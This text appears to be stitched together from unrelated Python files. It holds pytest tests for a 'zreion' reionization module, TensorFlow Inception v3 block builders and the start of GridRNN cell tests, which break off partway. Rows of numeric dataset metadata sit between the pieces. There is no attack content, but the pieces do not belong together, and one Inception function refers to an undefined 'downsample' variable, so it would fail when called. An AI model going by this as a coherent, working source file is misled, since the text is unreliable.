pytest_cases.fixture_ref(fake_data_random),
pytest_cases.fixture_ref(fake_data_deterministic_anisotropic),
pytest_cases.fixture_ref(fake_data_random_anisotropic),
],
)
def test_tophat():
"""Test tophat window function calculation."""
invals = np.linspace(1, 10, num=50)
refvals = 3 * (np.sin(invals) - invals * np.cos(invals)) / invals ** 3
outvals = zreion.tophat(invals)
assert np.allclose(refvals, outvals)
# test negative values
# function is even, so our same refvals work
invals = -invals
outvals = zreion.tophat(invals)
assert np.allclose(refvals, outvals)
# also test small values
invals = np.asarray([-1e-7, -1e-8, -1e-9, 0, 1e-9, 1e-8, 1e-7])
refvals = 1 - invals ** 2 / 10.0
# we get a numpy RuntimeWarning with small/invalid values
with pytest.warns(RuntimeWarning) as record:
outvals = zreion.tophat(invals)
assert len(record) == 1
assert record[0].message.args[0] == "invalid value encountered in true_divide"
# make sure values agree
assert np.allclose(refvals, outvals)
return
def test_sinc():
"""Test sinc function calculation."""
invals = np.linspace(1, 10, num=50)
refvals = np.sin(invals) / invals
outvals = zreion.sinc(invals)
assert np.allclose(refvals, outvals)
# test negative values
# function is even, so our same refvals work
invals = -invals
outvals = zreion.sinc(invals)
assert np.allclose(refvals, outvals)
# also test small values
invals = np.asarray([-1e-7, -1e-8, -1e-9, 0, 1e-9, 1e-8, 1e-7])
refvals = 1 - invals ** 2 / 6.0
# we get a numpy RuntimeWarning with small/invalid values
with pytest.warns(RuntimeWarning) as record:
outvals = zreion.sinc(invals)
assert len(record) == 1
assert record[0].message.args[0] == "invalid value encountered in true_divide"
# make sure values agree
assert np.allclose(refvals, outvals)
return
@fake_data_cases
def test_fft3d_forward(fake_data):
"""Test _fft3d function."""
data, is_random = fake_data
# use numpy as reference FFT
numpy_fft = np.fft.rfftn(data)
# run zreion fft
input_shape = data.shape
zreion_fft = zreion._fft3d(data, input_shape, direction="f")
# need relatively high tolerance because numpy fft is internally done at
# double precision, seemingly without a way to change it
assert np.allclose(numpy_fft, zreion_fft, atol=1e-4)
assert zreion_fft.dtype.type is np.complex64
return
@fake_data_cases
def test_fft3d_forward_double_precision(fake_data):
"""Test _fft3d function with double-precision."""
data, is_random = fake_data
data = np.asarray(data, dtype=np.float64)
# use numpy as reference FFT
numpy_fft = np.fft.rfftn(data)
# run zreion fft
input_shape = data.shape
zreion_fft = zreion._fft3d(data, input_shape, direction="f")
assert np.allclose(numpy_fft, zreion_fft)
assert zreion_fft.dtype.type is np.complex128
return
@fake_data_cases
def test_fft3d_backward(fake_data):
"""Test backward _fft3d function."""
data, is_random = fake_data
# use numpy as reference FFT
fake_data_ft = np.asarray(np.fft.rfftn(data), dtype=np.complex64)
# run zreion fft
input_shape = data.shape
zreion_fft = zreion._fft3d(fake_data_ft, input_shape, direction="b")
assert np.allclose(zreion_fft, data, atol=1e-6)
assert zreion_fft.dtype.type is np.float32
return
@fake_data_cases
def test_fft3d_backward_double(fake_data):
"""Test backward _fft3d function with double-precision."""
data, is_random = fake_data
data = np.asarray(data, dtype=np.float64)
fake_data_ft = np.asarray(np.fft.rfftn(data), dtype=np.complex128)
# run zreion fft
input_shape = data.shape
zreion_fft = zreion._fft3d(fake_data_ft, input_shape, direction="b")
assert np.allclose(zreion_fft, data)
assert zreion_fft.dtype.type is np.float64
return
def test_fft3d_direction_error(fake_data_deterministic):
"""Test _fft3d error in direction kwarg."""
data, is_random = fake_data_deterministic
# test giving a bogus direction
with pytest.raises(ValueError) as cm:
zreion._fft3d(data, data.shape, direction="blah")
assert str(cm.value).startswith('"direction" must be "f" or "b", got "blah"')
return
def test_fft3d_datatype_errors(fake_data_deterministic):
"""Test _fft3d errors with bad datatypes."""
data, is_random = fake_data_deterministic
# test using incorrect direction for real data
with pytest.raises(ValueError) as cm:
zreion._fft3d(data, data.shape, direction="b")
assert str(cm.value).startswith("a backward transform requires")
# test using incorrect direction for complex data
complex_data = np.asarray(data, dtype=np.complex64)
with pytest.raises(ValueError) as cm:
zreion._fft3d(complex_data, data.shape, direction="f")
assert str(cm.value).startswith("a forward transform requires")
# test using integer datatype
int_data = np.asarray(data, dtype=np.int32)
with pytest.raises(ValueError) as cm:
zreion._fft3d(int_data, data.shape, direction="f")
assert str(cm.value).startswith("a forward transform requires")
return
def test_fft3d_rank_errors(fake_data_deterministic):
"""Test _fft3d errors with data rank."""
data, is_random = fake_data_deterministic
with pytest.raises(ValueError) as cm:
zreion._fft3d(data, (0,), direction="f")
assert str(cm.value).startswith("data_shape must have 3 dimensions")
data_1d = data[0, 0, :]
with pytest.raises(ValueError) as cm:
zreion._fft3d(data_1d, data.shape, direction="f")
assert str(cm.value).startswith("input array must be a 3-dimensional array")
return
@fake_data_cases
def test_apply_zreion(fake_data):
"""Test apply_zreion."""
data, is_random = fake_data
# clean up input data
if not is_random:
data_mean = np.mean(data)
data = (data - data_mean) / data_mean
# define model parameters
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = True
zre = zreion.apply_zreion(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
# make sure results make sense
if is_random:
# agreement is not great for random values because of small array size
atol = 1e-1
else:
atol = 1e-6
assert np.isclose(np.mean(zre), zmean, atol=atol)
# also test passing in boxsize as a tuple--should give same answer
boxsize = (boxsize, boxsize, boxsize)
zre2 = zreion.apply_zreion(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
assert np.allclose(zre, zre2)
return
@fake_data_cases
def test_apply_zreion_no_deconvolution(fake_data):
"""Test apply_zreion with no deconvolution."""
data, is_random = fake_data
# clean up input data
if not is_random:
data_mean = np.mean(data)
data = (data - data_mean) / data_mean
# test with no deconvolution
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = False
zre = zreion.apply_zreion(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
# make sure results make sense
if is_random:
# agreement is not great for random values because of small array size
atol = 1e-1
else:
atol = 1e-6
assert np.isclose(np.mean(zre), zmean, atol=atol)
return
def test_apply_zreion_errors(fake_data_deterministic):
"""Test errors in the apply_zreion function."""
data, is_random = fake_data_deterministic
# define model parameters
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = True
# test using only a 1d density array
data_1d = data[0, 0, :]
with pytest.raises(ValueError) as cm:
zreion.apply_zreion(data_1d, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
assert str(cm.value).startswith("density must be a 3d array")
# test using a bad boxsize
boxsize = (10.0, 10.0)
with pytest.raises(ValueError) as cm:
zreion.apply_zreion(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
assert str(cm.value).startswith(
"boxsize must be either a single number or an array of length 3"
)
return
@fake_data_cases
def test_apply_zreion_fast(fake_data):
"""Test apply_zreion_fast."""
data, is_random = fake_data
# clean up input data
if not is_random:
data_mean = np.mean(data)
data = (data - data_mean) / data_mean
# define model parameters
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = True
zre = zreion.apply_zreion_fast(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
# make sure results make sense
if is_random:
# agreement is not great for random values because of small array size
atol = 1e-1
else:
atol = 1e-6
assert np.isclose(np.mean(zre), zmean, atol=atol)
# also test passing in boxsize as a tuple--should give same answer
boxsize = (boxsize, boxsize, boxsize)
zre2 = zreion.apply_zreion_fast(
data, zmean, alpha, k0, boxsize, rsmooth, deconvolve
)
assert np.allclose(zre, zre2)
return
@fake_data_cases
def test_apply_zreion_fast_no_deconvolution(fake_data):
"""Test apply_zreion_fast with no deconvolution."""
data, is_random = fake_data
# clean up input data
if not is_random:
data_mean = np.mean(data)
data = (data - data_mean) / data_mean
# test with no deconvolution
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = False
zre = zreion.apply_zreion_fast(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
# make sure results make sense
if is_random:
# agreement is not great for random values because of small array size
atol = 1e-1
else:
atol = 1e-6
assert np.isclose(np.mean(zre), zmean, atol=atol)
return
def test_apply_zreion_fast_errors(fake_data_deterministic):
"""Test errors in the apply_zreion_fast function."""
data, is_random = fake_data_deterministic
# define model parameters
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = True
# test using only a 1d density array
data_1d = data[0, 0, :]
with pytest.raises(ValueError) as cm:
zreion.apply_zreion_fast(
data_1d, zmean, alpha, k0, boxsize, rsmooth, deconvolve
)
assert str(cm.value).startswith("density must be a 3d array")
# test using a bad boxsize
boxsize = (10.0, 10.0)
with pytest.raises(ValueError) as cm:
zreion.apply_zreion_fast(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
assert str(cm.value).startswith(
"boxsize must be either a single number or an array of length 3"
)
return
@fake_data_cases
def test_compare_methods(fake_data):
"""Test that fast and "slow" methods yield same answer."""
data, is_random = fake_data
# define model parameters
zmean = 8.0
alpha = 0.9
k0 = 1.0
boxsize = 10.0
rsmooth = 1.0
deconvolve = True
# use slow function
zre1 = zreion.apply_zreion(data, zmean, alpha, k0, boxsize, rsmooth, deconvolve)
# use fast function
zre2 = zreion.apply_zreion_fast(
data, zmean, alpha, k0, boxsize, rsmooth, deconvolve
)
assert np.allclose(zre1, zre2)
return
| 28.764579
| 88
| 0.670821
| 1,914
| 13,318
| 4.521421
| 0.11651
| 0.050844
| 0.030506
| 0.025884
| 0.885024
| 0.860874
| 0.834412
| 0.774555
| 0.733071
| 0.711232
| 0
| 0.030415
| 0.229764
| 13,318
| 462
| 89
| 28.82684
| 0.813219
| 0.192146
| 0
| 0.741259
| 0
| 0
| 0.045189
| 0
| 0
| 0
| 0
| 0
| 0.122378
| 1
| 0.06993
| false
| 0
| 0.013986
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c78b5ab2d4af9fdf7119747e694108f4c7a8016e
| 14,885
|
py
|
Python
|
network/inception_block.py
|
yanzhicong/VAE-GAN
|
37fe060cd993d89c983bc8cfcc59c6edc3c5920f
|
[
"MIT"
] | 33
|
2018-08-17T13:06:29.000Z
|
2021-04-29T11:34:00.000Z
|
network/inception_block.py
|
yanzhicong/CVAEGAN
|
37fe060cd993d89c983bc8cfcc59c6edc3c5920f
|
[
"MIT"
] | 1
|
2018-05-25T02:17:08.000Z
|
2018-05-25T02:17:08.000Z
|
network/inception_block.py
|
yanzhicong/CVAEGAN
|
37fe060cd993d89c983bc8cfcc59c6edc3c5920f
|
[
"MIT"
] | 9
|
2019-01-28T21:35:16.000Z
|
2021-09-07T10:18:01.000Z
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2018 ZhicongYan
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
import tensorflow as tf
import tensorflow.contrib.layers as tcl
def inception_v3_figure4(
name, x, end_points,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[48,64], [64,96,], [32], [64]],
is_avg_pooling=True, downsample=False):
if downsample:
ds=2
else:
ds=1
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], 5,
stride=ds, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_5x5')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1a_1x1')
branch_1 = tcl.conv2d(branch_1, filters[1][1], 3,
stride=ds, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1b_3x3')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3, stride=ds, scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3, stride=ds, scope='maxpool_2a_3x3')
branch_2 = tcl.conv2d(branch_2, filters[2][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_2b_1x1')
with tf.variable_scope('branch3'):
branch_3 = tcl.conv2d(x, filters[3][0], 1,
stride=ds, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_3a_1x1')
x = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[name] = x
return x, end_points
def inception_v3_figure5(
name, x, end_points,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[64,96,96,], [48,64,], [64], [64]],
is_avg_pooling=True):
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], 3,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_3x3')
branch_0 = tcl.conv2d(branch_0, filters[0][2], 3,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0c_3x3')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1a_1x1')
branch_1 = tcl.conv2d(branch_1, filters[1][1], 3,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1b_3x3')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3, stride=1,
padding='SAME', scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3, stride=1,
padding='SAME', scope='maxpool_2a_3x3')
if not downsample:
branch_2 = tcl.conv2d(branch_2, filters[2][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_2b_1x1')
with tf.variable_scope('branch3'):
branch_3 = tcl.conv2d(x, filters[3][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_3a_1x1')
x = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[name] = x
return x, end_points
def inception_v3_figure5_downsample(
name, x, end_points,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[64,96,96,], [384,],],
is_avg_pooling=True):
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], 3,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_3x3')
branch_0 = tcl.conv2d(branch_0, filters[0][2], 3,
stride=2, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='VALID', weights_initializer=winit_fn, scope='conv2d_0c_3x3')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 3,
stride=2, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='VALID', weights_initializer=winit_fn, scope='conv2d_1a_3x3')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3, stride=2,
padding='VALID', scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3, stride=2,
padding='VALID', scope='maxpool_2a_3x3')
x = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
end_points[name] = x
return x, end_points
def inception_v3_figure6(
name, x, end_points, n,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[128,128,128,128,192,], [128,128,192,], [192], [192]],
is_avg_pooling=True):
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], [1, n],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_1xn')
branch_0 = tcl.conv2d(branch_0, filters[0][2], [n, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0c_nx1')
branch_0 = tcl.conv2d(branch_0, filters[0][3], [1, n],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0d_1xn')
branch_0 = tcl.conv2d(branch_0, filters[0][4], [n, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0e_nx1')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1a_1x1')
branch_1 = tcl.conv2d(branch_1, filters[1][1], [1, n],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1b_1xn')
branch_1 = tcl.conv2d(branch_1, filters[1][2], [n, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1c_nx1')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3,
padding='SAME', stride=1, scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3,
padding='SAME', stride=1, scope='maxpool_2a_3x3')
branch_2 = tcl.conv2d(branch_2, filters[2][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_2b_1x1')
with tf.variable_scope('branch3'):
branch_3 = tcl.conv2d(x, filters[3][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_3a_1x1')
x = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[name] = x
return x, end_points
def inception_v3_figure6_downsample(
name, x, end_points, n,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[192,192,192,192,], [192,320], [192], [192]],
is_avg_pooling=True):
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], [1, n],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_1xn')
branch_0 = tcl.conv2d(branch_0, filters[0][2], [n, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0c_nx1')
branch_0 = tcl.conv2d(branch_0, filters[0][3], [3, 3],
stride=2, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='VALID', weights_initializer=winit_fn, scope='conv2d_0d_3x3')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1a_1x1')
branch_1 = tcl.conv2d(branch_1, filters[1][1], [3, 3],
stride=2, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='VALID', weights_initializer=winit_fn, scope='conv2d_1b_3x3')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3,
padding='VALID', stride=2, scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3,
padding='VALID', stride=2, scope='maxpool_2a_3x3')
x = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
end_points[name] = x
return x, end_points
def inception_v3_figure7(
name, x, end_points,
act_fn, norm_fn, norm_params, winit_fn,
filters=[[448,384,[384,384,],], [384,[384,384,],], [192], [320]],
is_avg_pooling=True, downsample=False):
if downsample:
ds=2
else:
ds=1
with tf.variable_scope(name):
with tf.variable_scope('branch0'):
branch_0 = tcl.conv2d(x, filters[0][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0a_1x1')
branch_0 = tcl.conv2d(branch_0, filters[0][1], [3, 3],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0b_3x3')
with tf.variable_scope('branch0a'):
branch_0a = tcl.conv2d(branch_0, filters[0][2][0], [1, 3],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0ac_1x3')
with tf.variable_scope('branch0b'):
branch_0b = tcl.conv2d(branch_0, filters[0][2][1], [3, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_0bc_3x1')
with tf.variable_scope('branch1'):
branch_1 = tcl.conv2d(x, filters[1][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1a_1x1')
with tf.variable_scope('branch1a'):
branch_1a = tcl.conv2d(branch_1, filters[1][1][0], [1, 3],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1ab_1x3')
with tf.variable_scope('branch1b'):
branch_1b = tcl.conv2d(branch_1, filters[1][1][1], [3, 1],
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_1bb_3x1')
with tf.variable_scope('branch2'):
if is_avg_pooling:
branch_2 = tcl.avg_pool2d(x, 3,
padding='SAME', stride=1, scope='avgpool_2a_3x3')
else:
branch_2 = tcl.max_pool2d(x, 3,
padding='SAME', stride=1, scope='maxpool_2a_3x3')
branch_2 = tcl.conv2d(branch_2, filters[2][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_2b_1x1')
with tf.variable_scope('branch3'):
branch_3 = tcl.conv2d(x, filters[3][0], 1,
stride=1, activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
padding='SAME', weights_initializer=winit_fn, scope='conv2d_3a_1x1')
x = tf.concat(axis=3, values=[branch_0a, branch_0b, branch_1a, branch_1b, branch_2, branch_3])
end_points[name] = x
return x, end_points
| 45.243161
| 96
| 0.722674
| 2,306
| 14,885
| 4.373374
| 0.084996
| 0.09995
| 0.038076
| 0.070798
| 0.88468
| 0.871195
| 0.870798
| 0.862766
| 0.84938
| 0.846009
| 0
| 0.056346
| 0.140343
| 14,885
| 328
| 97
| 45.381098
| 0.731791
| 0.0782
| 0
| 0.76494
| 0
| 0
| 0.081788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023904
| false
| 0
| 0.007968
| 0
| 0.055777
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7b14eff40108a4982bb86e8c7af63e5fcfd5c7b
| 20,758
|
py
|
Python
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
connectthefuture/tensorflow
|
93812423fcd5878aa2c1d0b68dc0496980c8519d
|
[
"Apache-2.0"
] | 101
|
2016-12-03T11:40:52.000Z
|
2017-12-23T02:02:03.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
connectthefuture/tensorflow
|
93812423fcd5878aa2c1d0b68dc0496980c8519d
|
[
"Apache-2.0"
] | 9
|
2016-12-14T03:27:46.000Z
|
2017-09-13T02:29:07.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
connectthefuture/tensorflow
|
93812423fcd5878aa2c1d0b68dc0496980c8519d
|
[
"Apache-2.0"
] | 47
|
2016-12-04T12:37:24.000Z
|
2018-01-14T18:13:07.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GridRNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class GridRNNCellTest(tf.test.TestCase):
def testGrid2BasicLSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope(
'root', initializer=tf.constant_initializer(0.2)) as root_scope:
x = tf.zeros([1, 3])
m = tf.zeros([1, 8])
cell = tf.contrib.grid_rnn.Grid2BasicLSTMCell(2)
self.assertEqual(cell.state_size, 8)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 8))
sess.run([tf.global_variables_initializer()])
res = sess.run(
[g, s], {x: np.array([[1., 1., 1.]]),
m: np.array([[0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8]])})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.36617181, 0.36617181]])
self.assertAllClose(res[1], [[0.71053141, 0.71053141, 0.36617181,
0.36617181, 0.72320831, 0.80555487,
0.39102408, 0.42150158]])
# emulate a loop through the input sequence,
# where we call cell() multiple times
root_scope.reuse_variables()
g2, s2 = cell(x, m)
self.assertEqual(g2.get_shape(), (1, 2))
self.assertEqual(s2.get_shape(), (1, 8))
res = sess.run([g2, s2], {x: np.array([[2., 2., 2.]]), m: res[1]})
self.assertEqual(res[0].shape, (1, 2))
self.assertEqual(res[1].shape, (1, 8))
self.assertAllClose(res[0], [[0.58847463, 0.58847463]])
self.assertAllClose(res[1], [[1.40469193, 1.40469193, 0.58847463,
0.58847463, 0.97726452, 1.04626071,
0.4927212, 0.51137757]])
def testGrid2BasicLSTMCellTied(self):
with self.test_session() as sess:
with tf.variable_scope('root', initializer=tf.constant_initializer(0.2)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 8])
cell = tf.contrib.grid_rnn.Grid2BasicLSTMCell(2, tied=True)
self.assertEqual(cell.state_size, 8)
g, s = cell(x, m)
self.assertEqual(g.get_shape(), (1, 2))
self.assertEqual(s.get_shape(), (1, 8))
sess.run([tf.global_variables_initializer()])
